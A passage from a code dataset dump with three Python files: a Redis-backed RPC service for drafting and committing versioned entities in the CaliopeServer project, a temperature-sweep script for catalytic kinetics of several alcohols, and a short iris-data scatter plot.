exceptions import ValueError\n\nfrom tinyrpc.dispatch import public\nfrom redis import Redis\nimport json\nfrom tinyrpc.exc import RPCError\n\nfrom cid.utils.fileUtils import loadJSONFromFile\nfrom cid.utils.helpers import DatetimeEncoder, DatetimeDecoder\nfrom cid.core.pubsub import PubSub\n\nfrom cid.core.login import LoginManager\nfrom .utils import CaliopeEntityUtil\nfrom .models import VersionedNode, CaliopeTransaction\n\nfrom cid.core.access_control import AccessControlManager\n\n\nclass CaliopeServices(object):\n \"\"\"\n\n This class is the base for all future forms elements.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n cls.r = Redis()\n cls.service_class = kwargs[\"service_class\"] if \"service_class\" in \\\n kwargs else VersionedNode\n cls.draft_hkey = cls.service_class.__name__ + \"_drafts\"\n\n return cls\n\n def __init__(self, *args, **kwargs):\n super(CaliopeServices, self).__init__(*args, **kwargs)\n\n @classmethod\n @public(\"getAll\")\n def get_all(cls, *args, **kwargs):\n return cls.service_class.category().instance.all()\n\n @classmethod\n @public(\"getModel\")\n def get_empty_model(cls, entity_class=None, template_html=None,\n template_layout=None, actions=None, data=False):\n \"\"\"\n This method needs to be override if you want to use configured json\n forms.\n\n This methods creates an empty `py::class CaliopeEntityController` and\n returns the model and empty data. The model is returned based on the\n template, or creates a default template if `py::cons None`.\n\n At the ends, append generated draft uuid to Redis\n\n :param\n \"\"\"\n entity_controller = CaliopeEntityController(entity_class=entity_class,\n template_html=template_html,\n template_layout=template_layout,\n actions=actions)\n rv = entity_controller.get_model()\n if data:\n rv[\"data\"] = entity_controller.get_data()\n cls.set_drafts_uuid(rv['data']['uuid']['value'], entity_class)\n return rv\n\n @PendingDeprecationWarning\n @classmethod\n @public(\"getModelAndData\")\n def get_model_and_data(cls, uuid, entity_class=None, template_html=None, template_layout=None, actions=None):\n entity_controller = CaliopeEntityController(entity_class=entity_class,\n template_html=template_html,\n template_layout=template_layout,\n actions=actions)\n rv = entity_controller.get_model()\n rv[\"data\"] = entity_controller.get_data()\n cls.subscribe_uuid(uuid)\n return rv\n\n @classmethod\n def subscribe_uuid(cls, uuid):\n PubSub().subscribe_uuid(uuid)\n\n @classmethod\n def unsubscribe_uuid(cls, uuid):\n PubSub().unsubscribe_uuid(uuid)\n\n @classmethod\n def set_drafts_uuid(cls, uuid, entity_class):\n \"\"\"\n This methods check and creates the HSET in Redis with the key\n cls.draft_hkey where valid uuids are stored.\n \"\"\"\n\n if cls.r.hexists(cls.draft_hkey, uuid):\n raise KeyError(\"UUID {} already is a draft\".format(uuid))\n else:\n cls.r.hset(cls.draft_hkey, uuid, \"__draft__\")\n\n if entity_class is None:\n entity_class = VersionedNode\n if not cls.r.hexists(uuid + \"_class\", \"name\"):\n cls.r.hset(uuid + \"_class\", \"name\", entity_class.__name__)\n\n @classmethod\n def _set_related(cls, uuid, target_uuid, **kwargs):\n cls.r.hset(uuid + \"_related\", target_uuid, kwargs)\n\n @classmethod\n def _get_related(cls, uuid):\n return cls.r.hgetall(uuid + \"_related\")\n\n @classmethod\n def _del_related(cls, uuid, target_uuid):\n if cls.r.hexists(uuid + \"_related\", target_uuid):\n return cls.r.hdel(uuid + \"_related\", target_uuid)\n\n @classmethod\n def _is_related(cls, uuid, target_uuid):\n return 
cls.r.hexists(uuid + \"_related\", target_uuid)\n\n @classmethod\n def is_draft_not_commited(cls, uuid):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n @classmethod\n def _has_draft_props(cls, uuid):\n return cls.r.hlen(uuid) > 0\n\n @classmethod\n def _has_draft_rels(cls, uuid):\n return cls.r.hlen(uuid + \"_rels\") > 0\n\n @classmethod\n def _get_draft_props(cls, uuid):\n return {unicode(k,'utf-8'):unicode(v,'utf-8') for k,v in cls.r\n .hgetall(uuid).items()}\n\n @classmethod\n def _get_draft_rels(cls, uuid):\n return cls.r.hgetall(uuid + \"_rels\")\n\n\n @classmethod\n def _remove_draft_props(cls, uuid):\n return bool(cls.r.delete(uuid))\n\n @classmethod\n def _remove_draft_rels(cls, uuid):\n return bool(cls.r.delete(uuid + \"_rels\"))\n\n @classmethod\n def _get_draft_class(cls, uuid):\n \"\"\"\n Return the class of the uuid, even if is not yet saved.\n :param uuid: The UUID of the draft or saved object\n :return: The class of the object with uuid\n \"\"\"\n hkey = uuid + \"_class\"\n if cls.r.hexists(hkey, \"name\"):\n vncls = unicode(cls.r.hget(hkey, \"name\"),'utf-8')\n if vncls in VersionedNode\\\n .__extended_classes__:\n return VersionedNode.__extended_classes__[vncls]\n return VersionedNode\n else:\n vncls = VersionedNode.pull(uuid, only_class=True)\n if vncls:\n return vncls\n return VersionedNode\n\n @classmethod\n @public(\"updateField\")\n def update_field(cls, uuid, field_name, value, subfield_id=None,\n pos=None, delete=False, metadata=None):\n \"\"\"\n For updating entity drafts.\n\n This methods first checks for valid drafts in the Redis drafts for the\n class in cls.service_class, then creates a new redis.hset with the uuid\n and append the changes, if any, and marks the draft as stagged.\n\n Also pulls the object and refresh the draft with data from the saved\n `py::class VersionedNode`.\n\n\n \"\"\"\n\n def is_draft(uui):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n def append_change(uuid, key, value):\n if is_draft(uuid):\n cls.r.hdel(cls.draft_hkey, uuid)\n value = json.loads(json.dumps(value, cls=DatetimeEncoder),\n object_hook=DatetimeDecoder.json_date_parser)\n if isinstance(value, (dict, list,)):\n return cls.r.hset(uuid, key, json.dumps(value,\n cls=DatetimeEncoder))\n else:\n return cls.r.hset(uuid, key, value)\n\n def get_in_stage(uuid, field):\n \"\"\"\n hset returns 1 if is the first time a key, val is set,\n 0 if is an update.\n \"\"\"\n if cls.r.hexists(uuid, field):\n value = unicode(cls.r.hget(uuid, field),'utf-8')\n try:\n return json.loads(value,\n object_hook=\n DatetimeDecoder.json_date_parser)\n except:\n return value\n return None\n\n #: get the current node from database if exists\n versioned_node = cls.service_class.pull(uuid)\n\n if cls.r.hexists(uuid, field_name):\n draft_field = get_in_stage(uuid, field_name)\n elif versioned_node is not None:\n draft_field = getattr(versioned_node, field_name)\n else:\n draft_field = None\n\n if draft_field is not None:\n if subfield_id is not None:\n if pos is not None:\n if isinstance(draft_field[subfield_id], list) and \\\n isinstance(pos, int):\n if pos == -1:\n draft_field[subfield_id].append(value)\n elif len(draft_field[subfield_id]) > pos:\n if delete:\n del draft_field[subfield_id][pos]\n else:\n draft_field[subfield_id][pos] = value\n else:\n raise IndexError(\"Index does {} not exists in {}\"\n .format(pos, subfield_id))\n elif isinstance(draft_field[subfield_id], dict) and \\\n isinstance(pos, (unicode, str,)):\n if delete:\n del 
draft_field[subfield_id][pos]\n else:\n draft_field[subfield_id][pos] = value\n else:\n raise KeyError(\"Field {} does not exists in {}\"\n .format(subfield_id, field_name))\n else:\n if isinstance(subfield_id, int):\n if isinstance(draft_field, list):\n if subfield_id == -1:\n draft_field.append(value)\n elif len(draft_field) > subfield_id:\n if delete:\n del draft_field[subfield_id]\n else:\n draft_field[subfield_id] = value\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n else:\n raise TypeError(\"Field {} is not a {}\"\n .format(draft_field, str(list)))\n elif isinstance(draft_field, dict) and isinstance(\n subfield_id, (unicode, str,)):\n if delete:\n del draft_field[subfield_id]\n else:\n draft_field[subfield_id] = value\n else:\n raise TypeError(\"Field {} is not a {}\"\n .format(draft_field, str(dict)))\n else:\n if delete:\n draft_field = {}\n else:\n draft_field = value\n else:\n field = None\n subfield = None\n if pos is not None:\n if isinstance(pos, int):\n if pos == -1:\n subfield = [value]\n else:\n raise IndexError(\"Index does {} not exists in {}\"\n .format(pos, subfield_id))\n elif isinstance(pos, (unicode, str)):\n subfield = {pos: value}\n if subfield_id is not None:\n if isinstance(subfield_id, int):\n if subfield_id == -1:\n field = [subfield]\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n elif isinstance(subfield_id, (unicode, str,)):\n field = {subfield_id: subfield}\n draft_field = field\n elif subfield_id is not None:\n if isinstance(subfield_id, int):\n if subfield_id == -1:\n field = [value]\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n elif isinstance(subfield_id, (unicode, str,)):\n field = {subfield_id: value}\n draft_field = field\n else:\n draft_field = value\n\n cls._publish_update_field(uuid, field_name, value=value, subfield_id=subfield_id, pos=pos, delete=delete,\n metadata=metadata)\n\n return append_change(uuid, field_name, draft_field) in [0, 1]\n\n\n @classmethod\n @public(\"clearField\")\n def clear_field(cls, uuid, field_name, subfield_id=None, pos=None, metadata=None):\n return cls.update_field(uuid, field_name, None,\n subfield_id=subfield_id,\n pos=pos, delete=True, metadata=metadata)\n\n @classmethod\n @public(\"updateRelationship\")\n def update_relationship(cls, uuid, rel_name, target_uuid,\n new_properties={}, delete=False):\n \"\"\"\n TODO: Make sure only mark as draft changed rels.\n For updating entity drafts relationships.\n\n Also pulls the object and refresh the draft with data from the saved\n `py::class VersionedNode`.\n \"\"\"\n\n def is_draft(uui):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n def append_change(uuid, key, value):\n hkey_name = uuid + \"_rels\"\n if is_draft(uuid):\n cls.r.hdel(cls.draft_hkey, uuid)\n return cls.r.hset(hkey_name, key, json.dumps(value,\n cls=DatetimeEncoder))\n\n def get_draft_rel_count(uuid, rel_name):\n hkey_name = uuid + \"_rels\"\n draft_rel = get_in_stage(uuid, rel_name)\n added=0\n removed=0\n if draft_rel:\n added = len([x for x in draft_rel.values() if '__changed__' in x])\n removed = len([x for x in draft_rel.values() if '__delete__' in x])\n return added - removed\n\n\n def get_in_stage(uuid, key):\n \"\"\"\n hset returns 1 if is the first time a key, val is set,\n 0 if is an update.\n \"\"\"\n hkey_name = uuid + \"_rels\"\n if cls.r.hexists(hkey_name, key):\n return json.loads(unicode(cls.r.hget(hkey_name, 
key),'utf-8'),\n object_hook=DatetimeDecoder.json_date_parser)\n return None\n\n draft_rel = get_in_stage(uuid, rel_name)\n\n if draft_rel is None:\n versioned_node = cls.service_class.pull(uuid)\n if versioned_node is not None:\n draft_rel = versioned_node._format_relationships(rel_name)\n else:\n draft_rel = {}\n #: TODO this information can be extracted and put in redis\n rel_def = getattr(cls._get_draft_class(uuid), rel_name)\n if rel_def:\n __cardinality__ = rel_def.manager.description\n\n if delete:\n #: Mark the relationship to deletion on commit.\n draft_rel[target_uuid][\"__delete__\"] = True\n #: Remove from related\n cls._del_related(uuid, target_uuid)\n #remove changed mark\n if \"__changed__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__changed__\"]\n\n else:\n if 'zero or one' in __cardinality__:\n if get_draft_rel_count(uuid, rel_name) >= 1:\n for target_other in draft_rel.keys():\n draft_rel[target_other]['__delete__'] = True\n cls._del_related(uuid, target_other)\n #remove changed mark\n if \"__changed__\" in draft_rel[target_other]:\n del draft_rel[target_other][\"__changed__\"]\n draft_rel[target_uuid] = new_properties\n draft_rel[target_uuid][\"__changed__\"] = True\n #: add to related\n cls._set_related(uuid, target_uuid)\n #: remove if marked to delete\n if \"__delete__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__delete__\"]\n\n elif 'one or more' in __cardinality__:\n #Check at least one valid\n pass\n elif 'one relationship' == __cardinality__:\n #Check exactly one rel}\n pass\n elif 'zero or more' in __cardinality__:\n draft_rel[target_uuid] = new_properties\n draft_rel[target_uuid][\"__changed__\"] = True\n #: add to related\n cls._set_related(uuid, target_uuid)\n #: remove if marked to delete\n if \"__delete__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__delete__\"]\n\n\n\n return append_change(uuid, rel_name, draft_rel) in [0, 1]\n\n @classmethod\n @public(\"deleteRelationship\")\n def delete_relationship(cls, uuid, rel_name, target_uuid):\n return cls.update_relationship(uuid, rel_name, target_uuid,\n delete=True)\n\n\n @classmethod\n @public(\"commit\")\n def commit(cls, uuid, loopback_notification=False):\n \"\"\"\n Push the changes that are in the draft (Redis) to the neo4j database\n\n Also creates a node containg the changes doing within the commit for\n the conservation of the history of transactions in the system.\n \"\"\"\n #: TODO: Ensure all updates runs within the same transaction or batch.\n\n #: check for changes of any kind\n if cls._has_draft_props(uuid) or cls._has_draft_rels(uuid):\n versioned_node = cls.service_class.pull(uuid)\n #: if first time save create a node with given uuid.\n if versioned_node is None:\n node_class = cls._get_draft_class(uuid)\n versioned_node = node_class(uuid=uuid)\n #: apply first the properties changes\n if cls._has_draft_props(uuid):\n changes = cls._get_draft_props(uuid)\n for delta_k, delta_v in changes.items():\n try:\n delta_v = json.loads(delta_v,\n object_hook=DatetimeDecoder.json_date_parser)\n except BaseException as be:\n delta_v = DatetimeDecoder._parser(delta_v)\n #: do the changes\n versioned_node.update_field(delta_k, delta_v)\n #: clean stage area\n #: push all changes to database\n versioned_node.update_field('change_info',\n LoginManager().get_current_user_uuid(),\n special=True)\n versioned_node.save()\n\n cls._remove_draft_props(uuid)\n if cls._has_draft_rels(uuid):\n changes = cls._get_draft_rels(uuid)\n for delta_k, delta_v in 
changes.items():\n delta_v = json.loads(delta_v,\n object_hook=DatetimeDecoder.json_date_parser)\n #: do the deletes first.\n order_list = []\n for target, props in delta_v.items():\n if \"__delete__\" in props and props[\"__delete__\"]:\n order_list.insert(0, target)\n elif \"__changed__\" in props and props[\"__changed__\"]:\n order_list.append(target)\n #: do the changes for each target, in order first delete rels.\n for i in xrange(len(order_list)):\n target = order_list[i]\n props = delta_v[target]\n if \"__delete__\" in props and props[\"__delete__\"]:\n versioned_node.delete_relationship(delta_k, target)\n elif \"__changed__\" in props and props[\"__changed__\"]:\n del props[\"__changed__\"]\n versioned_node.add_or_update_relationship_target(\n delta_k, target, new_properties=props)\n #: clean stage area\n cls._remove_draft_rels(uuid)\n return {'uuid': uuid,\n 'value': versioned_node.uuid == uuid}\n else:\n return {'uuid': uuid, 'value': False}\n\n\n @classmethod\n @public(\"getData\")\n def get_data(cls, uuid, entity_class=None):\n try:\n PubSub().subscribe_uuid(uuid)\n if entity_class is None:\n entity_class = VersionedNode.pull(uuid, only_class=True)\n vnode = entity_class.pull(uuid)\n if vnode is None:\n #get a vnode with the class and uuid\n vnode = cls._get_vnode_with_data(uuid, entity_class)\n #: Append related uuids to the list.\n for rel_name, rel_repr in vnode._serialize_relationships() \\\n .items():\n for target_uuid in rel_repr.keys():\n direction = getattr(vnode, rel_name).direction\n cls._set_related(uuid, target_uuid, direction=direction)\n return cls._get_data_with_draft(vnode)\n except AssertionError:\n return RuntimeError(\"The give uuid {0} is not a valid object of \"\n \"class {1}\".format(uuid, cls.__name__))\n\n @classmethod\n @public(\"getHistory\")\n def get_history(cls, uuid):\n vnode = VersionedNode.pull(uuid)\n if vnode:\n return vnode.get_history(format='json')\n else:\n return {}\n\n @classmethod\n @public(\"discardDraft\")\n #@AccessControlManager.check_permission(\n # action=\"write\", uuid_pos=1)\n def discard_draft(cls, uuid):\n changed_fields = {}\n if cls._has_draft_props(uuid):\n changed_fields = cls._get_draft_props(uuid)\n vnode = VersionedNode.pull(uuid)\n if vnode is None:\n #: TODO what to do with non-saved nodes on discard\n pass\n return {'uuid': uuid, 'value': False}\n else:\n saved_data = vnode.serialize()\n #Notify to go back on saved data.\n for field_name in changed_fields.keys():\n value = saved_data[field_name][\"value\"] if \\\n field_name in saved_data else None\n cls._publish_update_field(uuid, field_name, value=value)\n rv = (cls._has_draft_props(uuid) and cls\n ._remove_draft_props(\n uuid))\n rv = rv or (cls._has_draft_rels(uuid) and cls._remove_draft_rels(\n uuid))\n return {'uuid': uuid, 'value': rv}\n\n @classmethod\n def _publish_update_field(cls, uuid, field_name, value, subfield_id=None,\n pos=None, delete=False, metadata=None, loopback_notification=False):\n rv = {'uuid': uuid, 'field': field_name, 'value': value,\n 'subfield_id': subfield_id, 'pos': pos, 'delete': delete, 'metadata': metadata}\n PubSub().publish_command('from_unused', uuid, 'updateField', rv, loopback=loopback_notification)\n\n\n @classmethod\n def _get_data_with_draft(cls, vnode):\n #: This method does nothing to the node it self, it just rewrites the\n #: value to be returned.\n rv = vnode.serialize()\n if cls._has_draft_props(vnode.uuid):\n for prop, value in cls._get_draft_props(vnode.uuid).items():\n rv[prop] = value\n if 
cls._has_draft_rels(vnode.uuid):\n for rel_name, rel_value in cls._get_draft_rels(vnode.uuid).items():\n rv[rel_name] = json.loads(rel_value,\n object_hook=\n DatetimeDecoder.json_date_parser)\n return rv\n\n\n @classmethod\n def _get_vnode_with_data(cls, uuid, entity_class):\n vnode = entity_class()\n vnode.uuid = uuid\n return vnode\n\n\n @classmethod\n @public(\"getDataByIndexKeyValue\")\n def get_data_key_value(cls, key, value):\n try:\n param = {key: value}\n return [vnode.serialize() for vnode in VersionedNode.index \\\n .search(**param)]\n except Exception as e:\n return RuntimeError(e)\n\n\nclass CaliopeEntityController(object):\n \"\"\"\n For handing operations on the nodes, this controller with be able to do\n operations with the data.\n\n Also will provide the json models from templates.\n \"\"\"\n\n def __init__(self, uuid=None, entity_class=None, template_html=None, template_layout=None, actions=None):\n \"\"\"\n\n :param entity_class:\n :param template_html:\n :return:\n \"\"\"\n self.template = None\n self.entity_class = entity_class\n self.entity = self.entity_class.pull(uuid) if uuid is not None else \\\n self.entity_class()\n self.template_html = template_html\n self.template_layout = template_layout\n self.actions = actions\n\n def get_data(self):\n if self.entity is None:\n self.entity = self.entity_class()\n return self.entity.serialize()\n\n def get_model(self):\n rv = dict()\n rv['form'] = self.get_form()\n rv['actions'] = self.get_actions()\n rv['layout'] = self.get_layout()\n return rv\n\n def get_form(self):\n try:\n if self.template_html is not None:\n self.template = loadJSONFromFile(self.template_html)\n else:\n self.template = CaliopeEntityUtil() \\\n .makeFormTemplate(self.entity_class)\n return self.template\n except:\n return list()\n\n def get_actions(self):\n #: TODO: Implement depending on user\n if self.actions is not None:\n return self.actions\n elif self.template and 'actions' in self.template:\n self.actions = self.template['actions']\n self.template.pop('actions')\n else:\n self.actions = [{\"name\": \"Guardar\", \"method\":\n self.entity_class.__name__ + \".commit\"}]\n return self.actions\n\n def get_layout(self):\n #: TODO: Implement depending on user\n try:\n if self.template_layout is not None:\n self.layout = loadJSONFromFile(self.template_layout)['layout']\n elif 'layout' in self.template: #for all in one template compatibility workaround\n self.layout = self.template['layout']\n self.template.pop('layout')\n else:\n self.layout = CaliopeEntityUtil() \\\n .makeLayoutTemplate(self.entity_class)\n return self.layout\n except:\n return list()\n\n\n\n","repo_name":"CaliopeProject/CaliopeServer","sub_path":"src/cid/core/entities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":26939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30517278739","text":"from thermop import thermoppt \nfrom thermop import adsTS_E \nfrom thermop import PES \nfrom pptx import ppt1,ppt2,ppt3,ppt4,ppt5\nfrom kin_temp0 import kineticparameter, dydt,solve_odes\nimport numpy as np\nfrom scipy.integrate import ode\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.constants as const\nfrom thermop import specie_index\n\n# GOOD FOR ESTIMATING EFFECT OF TEMP ON THE KINETICS RATE FOR DIFF CASES\n\"\"\"\ntitle2='propanol'\ntitle3= 'cyclopentanol'\ntitle1= '1-ol-oxacyclopentanol'\ntitle4= '2-ol-oxacyclopentanol'\ntitle5= '2-adamantanol+Bridge+FCC' \nTT = np.linspace(300, 1500, 2) 
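# A minimal, self-contained sketch of the sweep pattern this module uses:
# evaluate a rate model on a temperature grid and pick the grid point with
# the highest value, exactly like the max_p / max_T bookkeeping below. The
# Arrhenius/Langmuir constants here are illustrative placeholders, not
# fitted values from this project; the real sweeps call solve_odes with
# thermochemistry from the ppt* property functions.
import numpy as np

def toy_rate(T, A=1.0e6, Ea=60.0e3, dH=-100.0e3, dS=-120.0, R=8.314, p=1.0):
    # Arrhenius surface step times a Langmuir coverage term; because the
    # placeholder adsorption enthalpy is more negative than -Ea, the product
    # k*theta rises, peaks and then falls with T, like the P(T) curves below
    k = A * np.exp(-Ea / (R * T))          # forward rate constant
    K = np.exp(-(dH - T * dS) / (R * T))   # adsorption equilibrium, exp(-dG/RT)
    theta = K * p / (1.0 + K * p)          # Langmuir coverage at pressure p
    return k * theta

TT_demo = np.linspace(300.0, 1500.0, 121)
rates = toy_rate(TT_demo)
T_peak = float(TT_demo[int(np.argmax(rates))])  # ~860 K for these constants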
\n\ndef temp_effect1(): # <============= \n rr = []\n hh = []\n pp = []\n xxcat = []\n rrx = []\n uux = []\n hhx = []\n vvx = []\n ppx = []\n S_x_in = (18*1e-6)# mol/m^2 (equivalent of 0.44 ML from expt data)\n S_x = S_x_in/(1e-6) # umol/m^2 (equivalent of 0.44 ML from expt data)\n tlens=len(TT)\n i=0\n for i in range(tlens):\n T=TT[i]\n G_m, int_id, S_m, H_m = ppt1(T) # <============= \n xx, xcat, rx, ux, hx, vx, px, r, h, p = solve_odes(T,0.25,dydt, G_m, int_id, ['X','R','RX','UX','HX','VX','PX','H2','P','TS1','TS2','TSR','TSP','TSH2'],S_x) # <===== \n rr.append(float(r[-1]))\n hh.append(float(h[-1]))\n pp.append(float(p[-1])) \n xxcat.append(float(xcat[-1]/S_x)) \n rrx.append(float(rx[-1]/S_x))\n uux.append(float(ux[-1]/S_x))\n hhx.append(float(hx[-1]/S_x)) \n vvx.append(float(vx[-1]/S_x))\n ppx.append(float(px[-1]/S_x)) \n max_p = max(pp) # Find the maximum y value\n max_T = TT[pp.index(max_p)] # Find the x value corresponding to the maximum y value\n print (max_T, round(max_p,5))\n print(rr,hh,pp,TT)\n plt.figure(1) # <=========\n plt.title(title1) # <========= \n plt.plot(TT,rr, label='$n_R(T)$')\n plt.plot(TT,pp, label='$n_P(T)$')\n plt.plot(TT,hh, label='$n_{H2(T)}$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Amount of Substance in mol')\n plt.legend(loc=2,prop={'size':8})\n plt.figure(11) # <=========\n plt.title(title1) # <=========\n plt.plot(TT,xxcat, label='$X$')\n plt.plot(TT,rrx, label='$RX$')\n plt.plot(TT,uux, label='$UX$')\n plt.plot(TT,hhx, label='$HX$')\n plt.plot(TT,vvx, label='$VX$')\n plt.plot(TT,ppx, label='$PX$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Coverage Fraction')\n plt.legend(loc=5,prop={'size':8})\n return rr,hh,pp,xxcat,rrx,uux,hhx,vvx,ppx \n\"\"\"\n\n\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n\n\ndef temp_effect(temp, no_of_temp, moleculer_property_function, title_of_molecule, Order_specieID_list): # <============= \n title0=title_of_molecule\n TT = np.linspace(350, temp, no_of_temp) \n ppt = moleculer_property_function\n rr = []\n hh = []\n pp = []\n xxcat = []\n rrx = []\n uux = []\n hhx = []\n vvx = []\n ppx = []\n S_x_in = (18*1e-6)# mol/m^2 (equivalent of 0.44 ML from expt data)\n S_x = S_x_in/(1e-6) # umol/m^2 (equivalent of 0.44 ML from expt data)\n tlens=len(TT)\n i=0\n for i in range(tlens):\n T=TT[i]\n G_m, int_id, S_m, H_m = ppt(T) # <============= \n xx, xcat, rx, ux, hx, vx, px, r, h, p = solve_odes(T,0.08333,dydt, G_m, int_id, Order_specieID_list,S_x) # <===== 0.167 is 10min, 0.08333 is 5 min\n rr.append(float(r[-1]))\n hh.append(float(h[-1]))\n pp.append(float(p[-1])) \n xxcat.append(float(xcat[-1]/S_x)) \n rrx.append(float(rx[-1]/S_x))\n uux.append(float(ux[-1]/S_x))\n hhx.append(float(hx[-1]/S_x)) \n vvx.append(float(vx[-1]/S_x))\n ppx.append(float(px[-1]/S_x)) \n max_p = max(pp) # Find the maximum y value\n max_T = TT[pp.index(max_p)] # Find the x value corresponding to the maximum y value\n print (max_T, round(max_p,5))\n print(rr,hh,pp,TT)\n plt.figure(2) # <=========\n plt.title(title0) # <========= \n plt.plot(TT,rr, label='$R(T)$')\n plt.plot(TT,pp, label='$P(T)$')\n plt.plot(TT,hh, label='$H_2(T)$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Amount of Substance in mol')\n 
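    # close out figure 2 (gas-phase amounts vs T) before drawing figure 3 with the fractional surface coverages from the same sweep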
plt.legend(loc=2,prop={'size':8})\n plt.figure(3) # <=========\n plt.title(title0) # <=========\n plt.plot(TT,xxcat, label='$X(T)$')\n plt.plot(TT,rrx, label='$RX(T)$')\n plt.plot(TT,uux, label='$UX(T)$')\n plt.plot(TT,hhx, label='$HX(T)$')\n plt.plot(TT,vvx, label='$VX(T)$')\n plt.plot(TT,ppx, label='$PX(T)$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Coverage Fraction')\n plt.legend(loc=5,prop={'size':8})\n return TT, rr,hh,pp,xxcat,rrx,uux,hhx,vvx,ppx \n\ntitle2='propanol'\ntitle3= 'cyclopentanol'\ntitle1= '1-ol-oxacyclopentanol'\ntitle4= '2-ol-oxacyclopentanol'\ntitle5= '2-adamantanol+Bridge+FCC' \n\n\nTT1,rr1,hh1,pp1,x1,rx1,ux1,hx1,vx1,px1=temp_effect(525, 10, ppt1, title1, ['X','R','RX','UX','HX','VX','PX','H2','P','TS1','TS2','TSR','TSP','TSH2'])\nTT2,rr2,hh2,pp2,x2,rx2,ux2,hx2,vx2,px2=temp_effect(800, 10, ppt2, title2, ['X','Ra','RaX','UaX','HX','VaX','PaX','H2','Pa','TS1a','TS2a','TSRa','TSPa','TSH2'])\nTT3,rr3,hh3,pp3,x3,rx3,ux3,hx3,vx3,px3=temp_effect(625, 10, ppt3, title3, ['X','Rb','RbX','UbX','HX','VbX','PbX','H2','Pb','TS1b','TS2b','TSRb','TSPb','TSH2'])\nTT4,rr4,hh4,pp4,x4,rx4,ux4,hx4,vx4,px4=temp_effect(650, 10, ppt4, title4, ['X','Rc','RcX','UcX','HX','VcX','PcX','H2','Pc','TS1c','TS2c','TSRc','TSPc','TSH2'])\nTT5,rr5,hh5,pp5,x5,rx5,ux5,hx5,vx5,px5=temp_effect(700, 10, ppt5, title5, ['X','Rd','RdX','UdX','HX','VdX','PdX','H2','Pd','TS1d','TS2d','TSRd','TSPd','TSH2'])\n\nTT1\nTT2\nTT3\nTT4\nTT5\n\nmax_p1 = max(pp1) # Find the maximum y value\nmax_p2 = max(pp2) # Find the maximum y value\nmax_p3 = max(pp3) # Find the maximum y value\nmax_p4 = max(pp4) # Find the maximum y value\nmax_p5 = max(pp5) # Find the maximum y value\n\n\nmax_T1 = TT1[pp1.index(max_p1)] # Find the x value corresponding to the maximum y value\nmax_T2 = TT2[pp2.index(max_p2)] # Find the x value corresponding to the maximum y value\nmax_T3 = TT3[pp3.index(max_p3)] # Find the x value corresponding to the maximum y value\nmax_T4 = TT4[pp4.index(max_p4)] # Find the x value corresponding to the maximum y value\nmax_T5 = TT5[pp5.index(max_p5)] # Find the x value corresponding to the maximum y value\n\n\nprint (title1,'Tmax1=', max_T1, 'Pmax1=', round(max_p1,5))\nprint (title2,'Tmax2=', max_T2, 'Pmax2=', round(max_p2,5))\nprint (title3,'Tmax3=', max_T3, 'Pmax3=', round(max_p3,5))\nprint (title4,'Tmax4=', max_T4, 'Pmax4=', round(max_p4,5))\nprint (title5,'Tmax5=', max_T5, 'Pmax5=', round(max_p5,5))\n\n\n\n\n\n","repo_name":"toyegoke/toychem","sub_path":"oo_kin_temp1.py","file_name":"oo_kin_temp1.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8524382120","text":"from pylab import *\nimport matplotlib.pyplot as plt\nimport numpy\n\nimport csv\ncsvfile = open (\"iris.data\", \"r\")\nlines = csv.reader(csvfile)\ndataset = list (lines)\nfor x in range(len(dataset)):\n for y in range (4):\n dataset[x][y] = float(dataset[x][y])\n\n#xx = numpy.linspace(-0.75, 1., 100)\n#plt.scatter (xx, xx + 0.25*randn(len(xx)))\n#plt.show()\n\nles_x = []\nles_y = []\nles_couleurs = []\n\nfor i in range (0, len(dataset)):\n x = dataset [i] [2]\n y = dataset [i] [3]\n les_x.append (x)\n les_y.append (y)\n if dataset [i] [4] == 'Iris-setosa':\n couleur = 'blue'\n elif dataset [i] [4] == 'Iris-versicolor':\n couleur = 'green'\n else:\n couleur = 'red'\n plt.scatter (x, y, c = couleur)\n\nplt.show 
